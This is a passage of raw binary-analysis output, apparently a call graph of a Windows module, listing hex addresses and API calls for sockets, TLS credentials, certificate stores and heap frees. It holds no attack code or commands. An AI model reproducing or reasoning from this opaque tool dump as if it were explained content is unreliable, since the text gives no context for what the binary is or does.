109951->111250 109954 6cc1a27a 109952->109954 109955 6cc1971a 109952->109955 110032 6cc19570 109952->110032 109956 6cc625d0 26 API calls 109954->109956 111251 6cc46a27 27 API calls 109955->111251 109957 6cc1a28c 109956->109957 109958 6cc62860 26 API calls 109957->109958 109961 6cc1a296 109958->109961 109964 6cc625d0 26 API calls 109961->109964 109962 6cc1a0e8 memmove 109962->110031 109963 6cc19779 109965 6cc19795 109963->109965 111252 6cc4738f CertDuplicateCertificateContext 109963->111252 109967 6cc1a2a8 109964->109967 109966 6cc46abd 30 API calls 109965->109966 109969 6cc197aa 109966->109969 109970 6cc62860 26 API calls 109967->109970 109972 6cc197b2 109969->109972 109975 6cc19a39 109969->109975 109973 6cc1a2b2 109970->109973 109971 6cc19787 111253 6cc46a98 26 API calls 109971->111253 111254 6cc472e6 CertDuplicateStore 109972->111254 111264 6cc358e5 RtlFreeHeap 109975->111264 109978 6cc19a49 111265 6cc36b94 55 API calls 109978->111265 109979 6cc19801 111255 6cc46f1e CertCloseStore 109979->111255 109982 6cc19a52 memmove 109986 6cc19cb1 109982->109986 109987 6cc19d52 memmove memmove 109982->109987 109983 6cc1980a 111256 6cc46e15 26 API calls 109983->111256 109989 6cc19cf2 memmove 109986->109989 109990 6cc19cb8 memmove 109986->109990 109991 6cc19e6d memmove 109987->109991 109988 6cc19819 109992 6cc1987d 109988->109992 110001 6cc1982c 109988->110001 111257 6cc472e6 CertDuplicateStore 109988->111257 109993 6cc19e00 memmove 109989->109993 109994 6cc19d42 109989->109994 109990->109989 111269 6cc0ffd1 55 API calls 109991->111269 111259 6cc470d5 30 API calls 109992->111259 109993->109991 109994->109991 109997 6cc19ec8 109998 6cc19eec memmove 109997->109998 109999 6cc19ecf 109997->109999 110002 6cc1a051 memmove 109998->110002 109998->110031 110005 6cc19ed7 109999->110005 110006 6cc19f56 memmove 109999->110006 111258 6cbe7a7b RtlFreeHeap 110001->111258 111272 6cc1a2f0 57 API calls 110002->111272 110004 6cc198e6 110009 6cc198f0 110004->110009 110010 6cc19969 110004->110010 110005->110002 110006->109961 110007 6cc19f7e memmove 110006->110007 111270 6cc36ca0 93 API calls 110007->111270 111260 6cc36b94 55 API calls 110009->111260 111261 6cc3597c CertDuplicateStore 110010->111261 110013 6cc1a07d 111273 6cc1a2f0 57 API calls 110013->111273 110015 6cc199a3 111262 6cc35991 27 API calls 110015->111262 110016 6cc19fe3 110018 6cc1a144 memmove 110016->110018 110019 6cc1a006 110016->110019 110023 6cc1a1a7 memmove memmove 110018->110023 110024 6cc1a186 110018->110024 110022 6cc1a00d memmove 110019->110022 110021 6cc1a08b 110025 6cc1a0b5 memmove 110021->110025 110026 6cc1a094 110021->110026 111271 6cc1a2e6 56 API calls 110022->111271 110023->110022 110023->110031 110024->110019 110029 6cc1a1e5 memmove memmove 110024->110029 110025->110032 111274 6cc03cc1 26 API calls 110026->111274 110027 6cc19936 110033 6cc19ba7 memmove 110027->110033 110034 6cc19bd9 memmove 110027->110034 110029->110031 110031->109812 111275 6cbf5758 RtlFreeHeap 110032->111275 110033->110034 110037 6cc19c49 110034->110037 110035 6cc19a25 111266 6cc359de 27 API calls 110035->111266 110036 6cc199b9 110036->110035 111263 6cbf7118 28 API calls 110036->111263 111268 6cc35951 RtlFreeHeap 110037->111268 110042 6cc19a09 FreeContextBuffer 110042->110035 110044 6cc19a86 110048->109948 110049->109948 110050->109948 110051->109948 110052->109948 110053->109948 110054->109948 110055->109948 110056->109948 110057->109948 110058->109948 110060 6cc01d01 110059->110060 110061 6cc020f9 110060->110061 110958 6cc38dc4 46 API calls 110060->110958 110063 6cc625d0 26 API calls 110061->110063 110064 6cc0210b 110063->110064 110066 6cc62860 26 API calls 110064->110066 110068 6cc02115 110066->110068 110071 6cc62860 26 API calls 110068->110071 110075 6cc0211f 110071->110075 110080 6cc62860 26 API calls 110075->110080 110082 6cc02129 110080->110082 110086 6cc026f3 110082->110086 110090 6cc02174 110082->110090 110095 6cc026ff 110086->110095 110960 6cbf58f1 27 API calls 110086->110960 110920 6cbeb679 110090->110920 110962 6cc02ad4 57 API calls 110095->110962 110098 6cc027a0 110961 6cbeb449 27 API calls 110098->110961 110100 6cc021f5 memmove 110101 6cc0272f 110100->110101 110106 6cc0221c memmove 110100->110106 110959 6cc02ad4 RtlFreeHeap 110101->110959 110105 6cc01f0c 110963 6cbf5af6 RtlFreeHeap 110105->110963 110118 6cc01d63 110106->110118 110110 6cc027d9 110111 6cc0280b 110110->110111 110112 6cc5849d 28 API calls 110110->110112 110111->110118 110964 6cbf8282 110111->110964 110114 6cc0288d 110112->110114 110114->110111 110967 6cbe9d4c RtlFreeHeap 110114->110967 110118->109835 110120 6cc476d0 GetLastError 110119->110120 110121 6cc476dd 110119->110121 110120->110121 110121->109835 110123 6cc0148e 110122->110123 110124 6cbf796c RtlFreeHeap 110123->110124 110145 6cc014d6 110123->110145 110125 6cc0152f 110124->110125 111010 6cc029bb 110125->111010 110129 6cc01556 110130 6cc0155e 110129->110130 110131 6cc01858 110129->110131 111019 6cbf5af6 RtlFreeHeap 110130->111019 110132 6cc01f3a 110131->110132 110133 6cc01f4f 110131->110133 110136 6cbf796c RtlFreeHeap 110132->110136 110137 6cc465d5 26 API calls 110133->110137 110135 6cc01573 110138 6cbf8282 RtlFreeHeap 110135->110138 110135->110145 110155 6cc01f43 110136->110155 110151 6cc01f89 110137->110151 110139 6cc02819 110138->110139 111037 6cc02bf0 RtlFreeHeap 110139->111037 110140 6cc0162a 111020 6cbeb573 43 API calls __aulldiv 110140->111020 110144 6cc01659 110149 6cc01688 110144->110149 110167 6cc01824 110144->110167 110145->109835 110146 6cc01647 110150 6cc01af3 memmove memmove 110146->110150 110147 6cc01604 110147->110140 110147->110144 110148 6cc02082 110152 6cbf796c RtlFreeHeap 110148->110152 111021 6cbe78c9 RtlFreeHeap 110149->111021 110153 6cc01b92 110150->110153 110154 6cc01b45 110150->110154 110151->110148 111030 6cc6421b 26 API calls 110151->111030 110152->110155 111029 6cc38dc4 46 API calls 110153->111029 110159 6cc026f3 110154->110159 110164 6cc02174 110154->110164 110155->110147 111031 6cbf5af6 RtlFreeHeap 110155->111031 110158 6cc019cc 111024 6cbf5af6 RtlFreeHeap 110158->111024 110200 6cc026ff 110159->110200 111033 6cbf58f1 27 API calls 110159->111033 110160 6cc0183b 111022 6cbf5af6 RtlFreeHeap 110160->111022 110168 6cbeb679 43 API calls 110164->110168 110166 6cc01847 111025 6cbeb573 43 API calls __aulldiv 110166->111025 110167->110158 111023 6cbea7a2 26 API calls 110167->111023 110172 6cc021e5 110168->110172 110178 6cc021f5 memmove 110172->110178 110179 6cc0272f 110172->110179 110174 6cc027a0 111034 6cbeb449 27 API calls 110174->111034 110178->110179 110187 6cc0221c memmove 110178->110187 111032 6cc02ad4 RtlFreeHeap 110179->111032 110182 6cc01f0c 111036 6cbf5af6 RtlFreeHeap 110182->111036 110184 6cc01a68 110189 6cc01ad1 110184->110189 110190 6cc01a71 110184->110190 110187->110145 111028 6cbf5af6 RtlFreeHeap 110189->111028 111026 6cc58c9e 30 API calls 110190->111026 110199 6cc01a90 111027 6cbeb573 43 API calls __aulldiv 110199->111027 111035 6cc02ad4 57 API calls 110200->111035 110208 6cc027d9 110208->110135 110215 6cc5849d 28 API calls 110208->110215 110219 6cc0288d 110215->110219 110219->110135 111038 6cbe9d4c RtlFreeHeap 110219->111038 110232 6cc011ad 110231->110232 110233 6cc011e5 110232->110233 111041 6cc0cbf0 26 API calls 110232->111041 110235 6cc011e9 110233->110235 111042 6cbe042b 27 API calls 110233->111042 111044 6cc02974 27 API calls 110235->111044 110238 6cc0120d 110238->110235 110239 6cc01211 110238->110239 111043 6cbe3ca2 27 API calls 110239->111043 110241 6cc01226 110246 6cc0122f 110241->110246 111045 6cc0cbf0 26 API calls 110241->111045 110243 6cbf8282 RtlFreeHeap 110244 6cc02819 110243->110244 111069 6cc02bf0 RtlFreeHeap 110244->111069 110249 6cc014e7 110246->110249 110344 6cc01375 110246->110344 111046 6cbcafd0 110246->111046 110251 6cc01659 110249->110251 110252 6cc0162a 110249->110252 110255 6cc01688 110251->110255 110270 6cc01824 110251->110270 111052 6cbeb573 43 API calls __aulldiv 110252->111052 110254 6cc01647 110256 6cc01af3 memmove memmove 110254->110256 111053 6cbe78c9 RtlFreeHeap 110255->111053 110257 6cc01b92 110256->110257 110258 6cc01b45 110256->110258 111061 6cc38dc4 46 API calls 110257->111061 110263 6cc026f3 110258->110263 110267 6cc02174 110258->110267 110259 6cc01457 110278 6cbf796c RtlFreeHeap 110259->110278 110303 6cc014d6 110259->110303 110262 6cc019cc 111056 6cbf5af6 RtlFreeHeap 110262->111056 110309 6cc026ff 110263->110309 111065 6cbf58f1 27 API calls 110263->111065 110264 6cc0183b 111054 6cbf5af6 RtlFreeHeap 110264->111054 110271 6cbeb679 43 API calls 110267->110271 110269 6cc01847 111057 6cbeb573 43 API calls __aulldiv 110269->111057 110270->110262 111055 6cbea7a2 26 API calls 110270->111055 110275 6cc021e5 110271->110275 110282 6cc021f5 memmove 110275->110282 110283 6cc0272f 110275->110283 110277 6cc027a0 111066 6cbeb449 27 API calls 110277->111066 110284 6cc0152f 110278->110284 110282->110283 110292 6cc0221c memmove 110282->110292 111064 6cc02ad4 RtlFreeHeap 110283->111064 110293 6cc029bb RtlFreeHeap 110284->110293 110287 6cc01f0c 111068 6cbf5af6 RtlFreeHeap 110287->111068 110289 6cc01a68 110295 6cc01ad1 110289->110295 110296 6cc01a71 110289->110296 110292->110303 110299 6cc01540 110293->110299 111060 6cbf5af6 RtlFreeHeap 110295->111060 111058 6cc58c9e 30 API calls 110296->111058 110319 6cc01858 110299->110319 111050 6cc02974 27 API calls 110299->111050 110303->109835 110308 6cc01a90 111059 6cbeb573 43 API calls __aulldiv 110308->111059 111067 6cc02ad4 57 API calls 110309->111067 110313 6cc01556 110317 6cc0155e 110313->110317 110313->110319 111051 6cbf5af6 RtlFreeHeap 110317->111051 110324 6cc01f3a 110319->110324 110325 6cc01f4f 110319->110325 110320 6cc027d9 110330 6cc5849d 28 API calls 110320->110330 110320->110344 110333 6cbf796c RtlFreeHeap 110324->110333 110342 6cc465d5 26 API calls 110325->110342 110335 6cc0288d 110330->110335 110348 6cc01f43 110333->110348 110335->110344 111070 6cbe9d4c RtlFreeHeap 110335->111070 110353 6cc01f89 110342->110353 110344->110243 110344->110303 110348->110249 111063 6cbf5af6 RtlFreeHeap 110348->111063 110351 6cc02082 110352 6cbf796c RtlFreeHeap 110351->110352 110352->110348 110353->110351 111062 6cc6421b 26 API calls 110353->111062 110356 6cc01170 110355->110356 110357 6cc01167 110355->110357 110364 6cc011e5 110356->110364 111099 6cc0cbf0 26 API calls 110356->111099 110357->110356 110358 6cc020d3 110357->110358 110359 6cc62860 26 API calls 110358->110359 110360 6cc020dd 110359->110360 111119 6cc622d0 26 API calls 110360->111119 110363 6cc011e9 111102 6cc02974 27 API calls 110363->111102 110364->110363 111100 6cbe042b 27 API calls 110364->111100 110370 6cc0120d 110370->110363 110371 6cc01211 110370->110371 111101 6cbe3ca2 27 API calls 110371->111101 110375 6cc01226 110390 6cc0122f 110375->110390 111103 6cc0cbf0 26 API calls 110375->111103 110380 6cbf8282 RtlFreeHeap 110382 6cc02819 110380->110382 111125 6cc02bf0 RtlFreeHeap 110382->111125 110385 6cc01b45 110386 6cc026f3 110385->110386 110387 6cc02174 110385->110387 110404 6cc026ff 110386->110404 111121 6cbf58f1 27 API calls 110386->111121 110388 6cbeb679 43 API calls 110387->110388 110391 6cc021e5 110388->110391 110400 6cbcafd0 27 API calls 110390->110400 110403 6cc014e7 110390->110403 110417 6cc01375 110390->110417 110393 6cc021f5 memmove 110391->110393 110394 6cc0272f 110391->110394 110392 6cc027a0 111122 6cbeb449 27 API calls 110392->111122 110393->110394 110398 6cc0221c memmove 110393->110398 111120 6cc02ad4 RtlFreeHeap 110394->111120 110397 6cc01f0c 111124 6cbf5af6 RtlFreeHeap 110397->111124 110443 6cc014d6 110398->110443 110402 6cc01432 110400->110402 110402->110403 111104 6cc02974 27 API calls 110402->111104 110407 6cc01659 110403->110407 110408 6cc0162a 110403->110408 111123 6cc02ad4 57 API calls 110404->111123 110406 6cc027d9 110409 6cc5849d 28 API calls 110406->110409 110406->110417 110413 6cc01688 110407->110413 110427 6cc01824 110407->110427 111107 6cbeb573 43 API calls __aulldiv 110408->111107 110412 6cc0288d 110409->110412 110411 6cc01647 110414 6cc01af3 memmove memmove 110411->110414 110412->110417 111126 6cbe9d4c RtlFreeHeap 110412->111126 111108 6cbe78c9 RtlFreeHeap 110413->111108 110414->110385 110416 6cc01b92 110414->110416 111116 6cc38dc4 46 API calls 110416->111116 110417->110380 110417->110443 110420 6cc019cc 111111 6cbf5af6 RtlFreeHeap 110420->111111 110421 6cc0183b 111109 6cbf5af6 RtlFreeHeap 110421->111109 110425 6cc01847 111112 6cbeb573 43 API calls __aulldiv 110425->111112 110426 6cc01457 110430 6cbf796c RtlFreeHeap 110426->110430 110426->110443 110427->110420 111110 6cbea7a2 26 API calls 110427->111110 110433 6cc0152f 110430->110433 110437 6cc029bb RtlFreeHeap 110433->110437 110434 6cc01a68 110438 6cc01ad1 110434->110438 110439 6cc01a71 110434->110439 110440 6cc01540 110437->110440 111115 6cbf5af6 RtlFreeHeap 110438->111115 111113 6cc58c9e 30 API calls 110439->111113 110453 6cc01858 110440->110453 111105 6cc02974 27 API calls 110440->111105 110443->109835 110446 6cc01a90 111114 6cbeb573 43 API calls __aulldiv 110446->111114 110448 6cc01556 110451 6cc0155e 110448->110451 110448->110453 111106 6cbf5af6 RtlFreeHeap 110451->111106 110456 6cc01f3a 110453->110456 110457 6cc01f4f 110453->110457 110464 6cbf796c RtlFreeHeap 110456->110464 110470 6cc465d5 26 API calls 110457->110470 110475 6cc01f43 110464->110475 110480 6cc01f89 110470->110480 110475->110403 111118 6cbf5af6 RtlFreeHeap 110475->111118 110478 6cc02082 110479 6cbf796c RtlFreeHeap 110478->110479 110479->110475 110480->110478 111117 6cc6421b 26 API calls 110480->111117 111127 6cc57a3e 110482->111127 110486 6cc57f40 110487 6cc051a8 40 API calls 110486->110487 110488 6cc57f4e 110487->110488 110489 6cc57f54 110488->110489 110490 6cc57f7c 110488->110490 111152 6cbf58f1 27 API calls 110489->111152 110492 6cbe7564 26 API calls 110490->110492 110496 6cc57f70 110492->110496 110493 6cc57f69 110494 6cc58145 110493->110494 110493->110496 111157 6cc05199 39 API calls 110494->111157 110535 6cc58388 110496->110535 111141 6cc05199 39 API calls 110496->111141 110499 6cc5800e 110500 6cc58056 110499->110500 110501 6cc58016 110499->110501 110507 6cbe7584 2 API calls 110500->110507 110504 6cc051a8 40 API calls 110501->110504 110502 6cc58168 110506 6cc58166 110502->110506 111159 6cc569ca 45 API calls 110502->111159 110503 6cc58158 110503->110506 111158 6cc56472 45 API calls 110503->111158 110508 6cc5802a 110504->110508 111144 6cc57b93 110506->111144 110513 6cc58071 110507->110513 111153 6cc05199 39 API calls 110508->111153 110520 6cc580d1 110513->110520 110544 6cc583ae 110513->110544 111142 6cbf483c 110513->111142 110514 6cc58051 110514->109835 110522 6cc583d6 110520->110522 110523 6cc580dc 110520->110523 111168 6cc62230 26 API calls 110522->111168 110523->110535 111154 6cbf47fc WakeByAddressSingle 110523->111154 110530 6cc5803f 110530->110502 110530->110503 110530->110514 110531 6cc580f9 110559 6cc582de 110531->110559 111155 6cbf4cf0 WSAIoctl WSAGetLastError 110531->111155 110534 6cc582cc 111166 6cc57aee RtlFreeHeap 110534->111166 111167 6cc65699 26 API calls 110535->111167 110536 6cc58140 110538 6cc50110 3 API calls 110536->110538 110540 6cc581a1 110538->110540 110539 6cc5810f 110539->110536 110539->110559 111156 6cbf4cf0 WSAIoctl WSAGetLastError 110539->111156 111169 6cc624e0 26 API calls 110544->111169 110559->110534 110559->110535 110562 6cc01476 110561->110562 110563 6cbf796c RtlFreeHeap 110562->110563 110586 6cc014d6 110562->110586 110564 6cc0152f 110563->110564 110565 6cc029bb RtlFreeHeap 110564->110565 110566 6cc01540 110565->110566 110570 6cc01858 110566->110570 111191 6cc02974 27 API calls 110566->111191 110568 6cc01556 110569 6cc0155e 110568->110569 110568->110570 111192 6cbf5af6 RtlFreeHeap 110569->111192 110571 6cc01f3a 110570->110571 110572 6cc01f4f 110570->110572 110575 6cbf796c RtlFreeHeap 110571->110575 110576 6cc465d5 26 API calls 110572->110576 110574 6cc01573 110577 6cbf8282 RtlFreeHeap 110574->110577 110574->110586 110582 6cc01f43 110575->110582 110594 6cc01f89 110576->110594 110579 6cc02819 110577->110579 110578 6cc01604 110580 6cc01659 110578->110580 110581 6cc0162a 110578->110581 111210 6cc02bf0 RtlFreeHeap 110579->111210 110588 6cc01688 110580->110588 110605 6cc01824 110580->110605 111193 6cbeb573 43 API calls __aulldiv 110581->111193 110582->110578 111204 6cbf5af6 RtlFreeHeap 110582->111204 110586->109835 110587 6cc02082 110590 6cbf796c RtlFreeHeap 110587->110590 111194 6cbe78c9 RtlFreeHeap 110588->111194 110589 6cc01af3 memmove memmove 110591 6cc01b92 110589->110591 110592 6cc01b45 110589->110592 110590->110582 111202 6cc38dc4 46 API calls 110591->111202 110597 6cc026f3 110592->110597 110602 6cc02174 110592->110602 110594->110587 111203 6cc6421b 26 API calls 110594->111203 110596 6cc019cc 111197 6cbf5af6 RtlFreeHeap 110596->111197 110637 6cc026ff 110597->110637 111206 6cbf58f1 27 API calls 110597->111206 110598 6cc0183b 111195 6cbf5af6 RtlFreeHeap 110598->111195 110606 6cbeb679 43 API calls 110602->110606 110604 6cc01847 111198 6cbeb573 43 API calls __aulldiv 110604->111198 110605->110596 111196 6cbea7a2 26 API calls 110605->111196 110610 6cc021e5 110606->110610 110616 6cc021f5 memmove 110610->110616 110617 6cc0272f 110610->110617 110612 6cc027a0 111207 6cbeb449 27 API calls 110612->111207 110616->110617 110624 6cc0221c memmove 110616->110624 111205 6cc02ad4 RtlFreeHeap 110617->111205 110621 6cc01a68 110626 6cc01ad1 110621->110626 110627 6cc01a71 110621->110627 110624->110586 111201 6cbf5af6 RtlFreeHeap 110626->111201 111199 6cc58c9e 30 API calls 110627->111199 110636 6cc01a90 111200 6cbeb573 43 API calls __aulldiv 110636->111200 111208 6cc02ad4 57 API calls 110637->111208 110641 6cc027d9 110641->110574 110652 6cc5849d 28 API calls 110641->110652 110645 6cc01647 110645->110589 110656 6cc0288d 110652->110656 110656->110574 111211 6cbe9d4c RtlFreeHeap 110656->111211 110669 6cc01f0c 111209 6cbf5af6 RtlFreeHeap 110669->111209 110671 6cc0128b 110670->110671 110672 6cc62860 26 API calls 110671->110672 110673 6cc02129 110672->110673 110674 6cc026f3 110673->110674 110675 6cc02174 110673->110675 110676 6cc026ff 110674->110676 111213 6cbf58f1 27 API calls 110674->111213 110677 6cbeb679 43 API calls 110675->110677 111215 6cc02ad4 57 API calls 110676->111215 110679 6cc021e5 110677->110679 110681 6cc021f5 memmove 110679->110681 110682 6cc0272f 110679->110682 110680 6cc027a0 111214 6cbeb449 27 API calls 110680->111214 110681->110682 110686 6cc0221c memmove 110681->110686 111212 6cc02ad4 RtlFreeHeap 110682->111212 110685 6cc027ce 111216 6cbf5af6 RtlFreeHeap 110685->111216 110697 6cc02824 110686->110697 110689 6cc027d9 110690 6cc0280b 110689->110690 110691 6cc5849d 28 API calls 110689->110691 110692 6cbf8282 RtlFreeHeap 110690->110692 110690->110697 110693 6cc0288d 110691->110693 110694 6cc02819 110692->110694 110693->110690 111218 6cbe9d4c RtlFreeHeap 110693->111218 111217 6cc02bf0 RtlFreeHeap 110694->111217 110697->109835 110699 6cc014bd 110698->110699 110700 6cbf796c RtlFreeHeap 110699->110700 110722 6cc014d6 110699->110722 110701 6cc0152f 110700->110701 110702 6cc029bb RtlFreeHeap 110701->110702 110703 6cc01540 110702->110703 110707 6cc01858 110703->110707 111219 6cc02974 27 API calls 110703->111219 110705 6cc01556 110706 6cc0155e 110705->110706 110705->110707 111220 6cbf5af6 RtlFreeHeap 110706->111220 110708 6cc01f3a 110707->110708 110709 6cc01f4f 110707->110709 110712 6cbf796c RtlFreeHeap 110708->110712 110713 6cc465d5 26 API calls 110709->110713 110711 6cc01573 110714 6cbf8282 RtlFreeHeap 110711->110714 110711->110722 110717 6cc01f43 110712->110717 110728 6cc01f89 110713->110728 110715 6cc02819 110714->110715 111238 6cc02bf0 RtlFreeHeap 110715->111238 110716 6cc0162a 111221 6cbeb573 43 API calls __aulldiv 110716->111221 110724 6cc01604 110717->110724 111232 6cbf5af6 RtlFreeHeap 110717->111232 110721 6cc01659 110726 6cc01688 110721->110726 110743 6cc01824 110721->110743 110722->109835 110723 6cc01647 110727 6cc01af3 memmove memmove 110723->110727 110724->110716 110724->110721 110725 6cc02082 110729 6cbf796c RtlFreeHeap 110725->110729 111222 6cbe78c9 RtlFreeHeap 110726->111222 110730 6cc01b92 110727->110730 110731 6cc01b45 110727->110731 110728->110725 111231 6cc6421b 26 API calls 110728->111231 110729->110717 111230 6cc38dc4 46 API calls 110730->111230 110735 6cc026f3 110731->110735 110740 6cc02174 110731->110740 110734 6cc019cc 111225 6cbf5af6 RtlFreeHeap 110734->111225 110776 6cc026ff 110735->110776 111234 6cbf58f1 27 API calls 110735->111234 110736 6cc0183b 111223 6cbf5af6 RtlFreeHeap 110736->111223 110744 6cbeb679 43 API calls 110740->110744 110742 6cc01847 111226 6cbeb573 43 API calls __aulldiv 110742->111226 110743->110734 111224 6cbea7a2 26 API calls 110743->111224 110748 6cc021e5 110744->110748 110754 6cc021f5 memmove 110748->110754 110755 6cc0272f 110748->110755 110750 6cc027a0 111235 6cbeb449 27 API calls 110750->111235 110754->110755 110763 6cc0221c memmove 110754->110763 111233 6cc02ad4 RtlFreeHeap 110755->111233 110758 6cc01f0c 111237 6cbf5af6 RtlFreeHeap 110758->111237 110760 6cc01a68 110765 6cc01ad1 110760->110765 110766 6cc01a71 110760->110766 110763->110722 111229 6cbf5af6 RtlFreeHeap 110765->111229 111227 6cc58c9e 30 API calls 110766->111227 110775 6cc01a90 111228 6cbeb573 43 API calls __aulldiv 110775->111228 111236 6cc02ad4 57 API calls 110776->111236 110784 6cc027d9 110784->110711 110791 6cc5849d 28 API calls 110784->110791 110795 6cc0288d 110791->110795 110795->110711 111239 6cbe9d4c RtlFreeHeap 110795->111239 110808 6cc01880 110807->110808 110809 6cc01c13 110807->110809 110812 6cc625d0 26 API calls 110808->110812 111240 6cc38dc4 46 API calls 110809->111240 110813 6cc0210b 110812->110813 110814 6cc62860 26 API calls 110813->110814 110817 6cc02115 110814->110817 110821 6cc62860 26 API calls 110817->110821 110824 6cc0211f 110821->110824 110826 6cc62860 26 API calls 110824->110826 110828 6cc02129 110826->110828 110831 6cc026f3 110828->110831 110836 6cc02174 110828->110836 110864 6cc026ff 110831->110864 111242 6cbf58f1 27 API calls 110831->111242 110832 6cc01c4f 110832->109835 110839 6cbeb679 43 API calls 110836->110839 110844 6cc021e5 110839->110844 110848 6cc021f5 memmove 110844->110848 110849 6cc0272f 110844->110849 110846 6cc027a0 111243 6cbeb449 27 API calls 110846->111243 110848->110849 110856 6cc0221c memmove 110848->110856 111241 6cc02ad4 RtlFreeHeap 110849->111241 110853 6cc01f0c 111245 6cbf5af6 RtlFreeHeap 110853->111245 110856->110832 111244 6cc02ad4 57 API calls 110864->111244 110865 6cc027d9 110866 6cc5849d 28 API calls 110865->110866 110872 6cc0280b 110865->110872 110868 6cc0288d 110866->110868 110867 6cbf8282 RtlFreeHeap 110869 6cc02819 110867->110869 110868->110872 111247 6cbe9d4c RtlFreeHeap 110868->111247 111246 6cc02bf0 RtlFreeHeap 110869->111246 110872->110832 110872->110867 110873->109844 110874->109851 110875->109859 110876->109853 110878 6cc46ad4 110877->110878 110879 6cc465d5 26 API calls 110878->110879 110880 6cc46b39 110879->110880 110881 6cc46d0c 110880->110881 110882 6cc46b58 110880->110882 111248 6cc6421b 26 API calls 110881->111248 110884 6cc46bc2 GetModuleHandleW 110882->110884 110885 6cc46c69 110882->110885 110887 6cc46c77 AcquireCredentialsHandleA 110884->110887 110888 6cc46bd5 GetProcAddress 110884->110888 110885->110887 110886 6cc46d22 111249 6cc61e40 26 API calls 110886->111249 110889 6cc46cb7 110887->110889 110890 6cc46cab 110887->110890 110888->110887 110891 6cc46be8 memset 110888->110891 110893 6cc50110 3 API calls 110889->110893 110895 6cc60989 RtlFreeHeap 110890->110895 110896 6cc46c19 110891->110896 110894 6cc46cd4 110893->110894 110894->110886 110894->110890 110897 6cc197aa 110895->110897 110896->110887 110897->109860 110897->109863 110898->109867 110899->109871 110900->109876 110901->109889 110902->109880 110908->109866 110909->109870 110913->109885 110919->109850 110921 6cbeb6ae WSASocketW 110920->110921 110922 6cbeb855 110920->110922 110924 6cbeb6c9 ioctlsocket 110921->110924 110925 6cbeb6f0 GetLastError 110921->110925 110974 6cc64940 110922->110974 110928 6cbeb6e9 110924->110928 110929 6cbeb736 GetLastError 110924->110929 110971 6cbeb449 27 API calls 110925->110971 110926 6cbeb87b 110976 6cbebb1b RtlFreeHeap 110926->110976 110972 6cbebafa 27 API calls 110928->110972 110929->110928 110930 6cbeb70a 110930->110924 110950 6cbeb716 110930->110950 110932 6cbeb75a 110936 6cbeb88f 110932->110936 110945 6cbeb762 closesocket 110932->110945 110973 6cc47a4f setsockopt GetLastError 110932->110973 110968 6cc4768c bind 110936->110968 110937 6cbeb7ae 110937->110926 110938 6cbeb7c1 WSAIoctl 110937->110938 110938->110936 110940 6cbeb84a GetLastError 110938->110940 110940->110926 110943 6cbeb9c7 110944 6cbeb9fe 110943->110944 110943->110945 110946 6cbeba2e 110944->110946 110978 6cc47a4f setsockopt GetLastError 110944->110978 110945->110950 110947 6cbeba61 110946->110947 110980 6cc47a4f setsockopt GetLastError 110946->110980 110947->110950 110982 6cc47a4f setsockopt GetLastError 110947->110982 110950->110100 110950->110101 110951 6cbeba1a 110951->110946 110979 6cbebb1b RtlFreeHeap 110951->110979 110952 6cbeba4d 110952->110947 110981 6cbebb1b RtlFreeHeap 110952->110981 110955 6cbeba8a 110955->110950 110959->110095 110960->110098 110961->110095 110962->110105 110963->110110 111009 6cbd9d0b RtlFreeHeap 110964->111009 110966 6cbf828f 110967->110111 110969 6cc476a5 GetLastError 110968->110969 110970 6cbeb986 110968->110970 110969->110970 110977 6cbebafa 27 API calls 110970->110977 110971->110930 110972->110932 110973->110937 110984 6cc64964 110974->110984 110976->110936 110977->110943 110978->110951 110979->110946 110980->110952 110981->110947 110982->110955 110985 6cc649e7 110984->110985 110986 6cc6497e 110984->110986 110993 6cc4f9b0 110985->110993 110986->110985 110987 6cc64adf 110986->110987 110988 6cc649ce WaitOnAddress 110986->110988 110988->110986 110990 6cc649de GetLastError 110988->110990 110990->110986 110991 6cc64ad6 WakeByAddressAll 110991->110987 110994 6cc4fa06 110993->110994 110995 6cc4f9cc memset WSAStartup 110993->110995 111007 6cc625b0 26 API calls 110994->111007 110996 6cc4f9f5 110995->110996 110997 6cc4fa10 110995->110997 110996->110987 110996->110991 111008 6cc65030 26 API calls 110997->111008 111009->110966 111011 6cc029f2 111010->111011 111012 6cc029c6 111010->111012 111040 6cc02c76 RtlFreeHeap 111011->111040 111014 6cc01540 111012->111014 111015 6cc029db 111012->111015 111016 6cbf796c RtlFreeHeap 111012->111016 111014->110131 111018 6cc02974 27 API calls 111014->111018 111015->111014 111039 6cc02c76 RtlFreeHeap 111015->111039 111016->111015 111018->110129 111019->110135 111020->110146 111021->110160 111022->110166 111023->110167 111024->110166 111025->110184 111026->110199 111027->110146 111028->110150 111030->110151 111031->110147 111032->110200 111033->110174 111034->110200 111035->110182 111036->110208 111037->110145 111038->110135 111039->111014 111040->111014 111041->110233 111042->110238 111043->110241 111044->110246 111045->110246 111071 6cbcaae0 111046->111071 111049 6cc02974 27 API calls 111049->110259 111050->110313 111051->110344 111052->110254 111053->110264 111054->110269 111055->110270 111056->110269 111057->110289 111058->110308 111059->110254 111060->110256 111062->110353 111063->110249 111064->110309 111065->110277 111066->110309 111067->110287 111068->110320 111069->110303 111070->110344 111087 6cbcac10 111071->111087 111073 6cbcab10 111073->110249 111073->111049 111075 6cbcabd0 111094 6cc62270 26 API calls 111075->111094 111076 6cbcab81 111077 6cbcac10 26 API calls 111076->111077 111079 6cbcab90 111077->111079 111080 6cbcabe1 111079->111080 111081 6cbcab9c 111079->111081 111095 6cc62550 26 API calls 111080->111095 111083 6cbcabf0 111081->111083 111084 6cbcaba1 memmove 111081->111084 111096 6cc62270 26 API calls 111083->111096 111084->111073 111092 6cbcab08 111087->111092 111093 6cbcac20 111087->111093 111088 6cbcac52 111088->111092 111098 6cc621d0 26 API calls 111088->111098 111092->111073 111092->111075 111092->111076 111093->111088 111093->111092 111097 6cc621d0 26 API calls 111093->111097 111099->110364 111100->110370 111101->110375 111102->110390 111103->110390 111104->110426 111105->110448 111106->110417 111107->110411 111108->110421 111109->110425 111110->110427 111111->110425 111112->110434 111113->110446 111114->110411 111115->110414 111117->110480 111118->110403 111120->110404 111121->110392 111122->110404 111123->110397 111124->110406 111125->110443 111126->110417 111128 6cc57511 26 API calls 111127->111128 111129 6cc57a48 111128->111129 111131 6cc57a53 111129->111131 111171 6cc576c0 111129->111171 111133 6cc57a6b 111131->111133 111175 6cc64295 26 API calls 111131->111175 111134 6cc5a44b 111133->111134 111135 6cc5a457 111134->111135 111136 6cc5a451 111134->111136 111137 6cc625d0 26 API calls 111135->111137 111136->110486 111138 6cc5a467 111137->111138 111139 6cc5a470 111138->111139 111140 6cc625d0 26 API calls 111138->111140 111139->110486 111141->110499 111177 6cbf4854 